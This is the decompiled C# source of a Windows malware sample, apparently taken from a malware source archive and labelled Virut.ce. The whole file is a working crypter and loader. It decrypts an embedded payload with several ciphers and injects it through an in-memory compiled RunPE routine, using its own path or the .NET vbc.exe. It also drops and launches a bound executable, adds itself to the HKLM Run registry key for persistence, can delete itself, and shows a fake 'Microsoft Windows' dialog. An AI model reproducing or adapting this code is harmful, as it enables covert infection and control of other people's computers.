MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d/fjYIWqNzRsrEuPM.cs

356 lines
17 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: fjYIWqNzRsrEuPM
// Assembly: 3, Version=830.23.182.254, Culture=neutral, PublicKeyToken=null
// MVID: 3AB55594-508F-4214-AA1C-DD579280B133
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net.NetworkInformation;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;
[StandardModule]
internal sealed class fjYIWqNzRsrEuPM
{
public static string yqtchzIOqOKBrSD;
public static string lJwYYoItFcgpqET;
[STAThread]
public static void Main()
{
char ch = '%';
ResourceManager resourceManager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly());
Encoding encoding = Encoding.Default;
string str1 = resourceManager.GetString("crypted");
string str2 = resourceManager.GetString("settings");
fjYIWqNzRsrEuPM.yqtchzIOqOKBrSD = resourceManager.GetString("bind");
fjYIWqNzRsrEuPM.lJwYYoItFcgpqET = resourceManager.GetString("runpe");
string[] strArray = str2.Split(ch);
string str3 = strArray[2];
string Left1 = strArray[1];
string Left2 = strArray[4];
string Left3 = strArray[5];
string Left4 = strArray[3];
string Left5 = strArray[11];
string Left6 = strArray[6];
if (Operators.CompareString(strArray[10], "1", false) == 0)
fjYIWqNzRsrEuPM.aXQMuDulpbuaEay();
if (Operators.CompareString(Left4, "1", false) == 0)
Daanteys.Enable();
if (Operators.CompareString(Left3, "1", false) == 0)
new Thread(new ThreadStart(fjYIWqNzRsrEuPM.mMBTPviKNdprvRd))
{
IsBackground = true
}.Start();
if (Environment.OSVersion.Platform.ToString().Contains("32") || Environment.OSVersion.Platform.ToString().Contains("86"))
{
if (Operators.CompareString(Left1, "RC4", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.YkqdEiNjkYEcGHU(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "AES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.PhCrUkyjFEeSSOb(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "DES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.DfrVzRBLTZVYiTu(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "RC2", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.VhCqeEsmyAGjexn(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "STR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "XOR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ZHfmltHRHxetfJW(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "TDES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.uwffzkjdFvQZybM(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
}
else if (Operators.CompareString(Left1, "RC4", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.YkqdEiNjkYEcGHU(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "AES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.PhCrUkyjFEeSSOb(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "DES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.DfrVzRBLTZVYiTu(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "RC2", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.VhCqeEsmyAGjexn(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "STR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "XOR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ZHfmltHRHxetfJW(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "TDES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.uwffzkjdFvQZybM(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
if (Operators.CompareString(Left2, "1", false) == 0)
fjYIWqNzRsrEuPM.qfiZEWBAVDVcXYV();
if (Operators.CompareString(Left6, "1", false) == 0)
{
string Left7 = strArray[7];
if (Operators.CompareString(Left7, "", false) == 0)
{
int num1 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Critical, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Exclamation", false) == 0)
{
int num2 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Exclamation, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Critical", false) == 0)
{
int num3 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Critical, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Question", false) == 0)
{
int num4 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Question, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Information", false) == 0)
{
int num5 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Information, (object) strArray[9]);
}
}
if (Operators.CompareString(Left5, "1", false) != 0)
return;
fjYIWqNzRsrEuPM.coFIciVHjFSurZy();
}
public static void mMBTPviKNdprvRd()
{
File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/temp.exe", Convert.FromBase64String(fjYIWqNzRsrEuPM.yqtchzIOqOKBrSD));
Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/temp.exe");
}
public static void roKWNVYxmxtHPPs(string source)
{
CompilerResults compilerResults = new VBCodeProvider().CompileAssemblyFromSource(new CompilerParameters()
{
GenerateExecutable = false,
GenerateInMemory = true
}, source);
if (compilerResults.Errors.Count > 0)
return;
compilerResults.CompiledAssembly.GetType("Inject.RunPE").GetMethod("InjectPE").Invoke((object) null, (object[]) null);
}
public static string PhCrUkyjFEeSSOb(string input, string pass)
{
RijndaelManaged rijndaelManaged = new RijndaelManaged();
MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
string str;
try
{
byte[] destinationArray = new byte[32];
byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes(pass));
Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
rijndaelManaged.Key = destinationArray;
rijndaelManaged.Mode = CipherMode.ECB;
ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
public static string YkqdEiNjkYEcGHU(string message, string password)
{
message = Encoding.Default.GetString(Convert.FromBase64String(message));
int index1 = 0;
int index2 = 0;
StringBuilder stringBuilder = new StringBuilder();
string empty = string.Empty;
int[] numArray1 = new int[257];
int[] numArray2 = new int[257];
int length = password.Length;
int location1 = 0;
while (location1 <= (int) byte.MaxValue)
{
char String = password.Substring(location1 % length, 1).ToCharArray()[0];
numArray2[location1] = Strings.Asc(String);
numArray1[location1] = location1;
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
int index3 = 0;
int location2 = 0;
while (location2 <= (int) byte.MaxValue)
{
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
int num = numArray1[location2];
numArray1[location2] = numArray1[index3];
numArray1[index3] = num;
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
}
int location3 = 1;
while (location3 <= message.Length)
{
index1 = checked (index1 + 1) % 256;
index2 = checked (index2 + numArray1[index1]) % 256;
int num1 = numArray1[index1];
numArray1[index1] = numArray1[index2];
numArray1[index2] = num1;
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
int CharCode = Strings.Asc(message.Substring(checked (location3 - 1), 1).ToCharArray()[0]) ^ num2;
stringBuilder.Append(Strings.Chr(CharCode));
Math.Max(Interlocked.Increment(ref location3), checked (location3 - 1));
}
string str = stringBuilder.ToString();
stringBuilder.Length = 0;
return str;
}
public static string ZHfmltHRHxetfJW(string Input, string pass)
{
StringBuilder stringBuilder = new StringBuilder();
int num = checked (Input.Length - 1);
int startIndex = 0;
while (startIndex <= num)
{
int index;
string str = Conversions.ToString(Strings.Chr(checked ((int) (Conversions.ToLong("&H" + Input.Substring(startIndex, 2)) ^ (long) Strings.Asc(pass[index])))));
stringBuilder.Append(str);
if (index == checked (pass.Length - 1))
index = 0;
else
checked { ++index; }
checked { startIndex += 2; }
}
return stringBuilder.ToString();
}
public static string uwffzkjdFvQZybM(string input, string pass)
{
TripleDESCryptoServiceProvider cryptoServiceProvider1 = new TripleDESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
string str;
try
{
byte[] destinationArray = new byte[24];
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass));
Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 8);
cryptoServiceProvider1.Key = destinationArray;
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
public static string ghWPuuObTVRPWrY(string Data, string key) => Encoding.Default.GetString(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(Encoding.Default.GetBytes(Data), Encoding.Default.GetBytes(key)));
public static byte[] ghWPuuObTVRPWrY(byte[] Data, byte[] key)
{
int index = checked (Data.Length - 1);
while (index >= 0)
{
Data[index] = checked ((byte) unchecked (checked (((int) Data[index] ^ (int) key[unchecked (index % key.Length)]) - (int) Data[unchecked (checked (index + 1) % Data.Length)] + 256) % 256));
checked { index += -1; }
}
return Data;
}
public static string VhCqeEsmyAGjexn(string input, string pass)
{
RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
string str;
try
{
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass));
cryptoServiceProvider1.Key = hash;
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
public static string DfrVzRBLTZVYiTu(string input, string pass)
{
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
string str;
try
{
byte[] destinationArray = new byte[8];
Array.Copy((Array) cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass)), 0, (Array) destinationArray, 0, 8);
cryptoServiceProvider1.Key = destinationArray;
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
public static void qfiZEWBAVDVcXYV()
{
try
{
File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\jseEiuRiWjuDNIfRFtRiZFMfRFr.exe");
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey.GetValue(Application.ProductName) == null)
registryKey.SetValue(Application.ProductName, (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\jseEiuRiWjuDNIfRFtRiZFMfRFr.exe"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
[DllImport("kernel32", EntryPoint = "GetModuleFileNameA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int GetModuleFileName(int hModule, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName, int nSize);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ExitProcess(uint uExitCode);
[DllImport("kernel32", EntryPoint = "MoveFileExW", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int MoveFile([MarshalAs(UnmanagedType.LPTStr), In] string lpExistingFileName, [MarshalAs(UnmanagedType.LPTStr), In] string lpNewFileName, long dwFlags);
public static void coFIciVHjFSurZy()
{
string executablePath1 = Application.ExecutablePath;
string executablePath2 = Application.ExecutablePath;
int moduleFileName = fjYIWqNzRsrEuPM.GetModuleFileName(0, ref executablePath2, 256);
fjYIWqNzRsrEuPM.MoveFile(Strings.Left(executablePath1, moduleFileName), Path.GetTempPath() + "\\tmpG" + DateTime.Now.Millisecond.ToString() + ".tmp", 8L);
fjYIWqNzRsrEuPM.ExitProcess(0U);
}
public static void aXQMuDulpbuaEay()
{
if (NetworkInterface.GetIsNetworkAvailable())
return;
int num = (int) Interaction.MsgBox((object) "You need an Internet Connection to run this programm !", Title: ((object) "Microsoft Windows"));
Environment.Exit(0);
}
}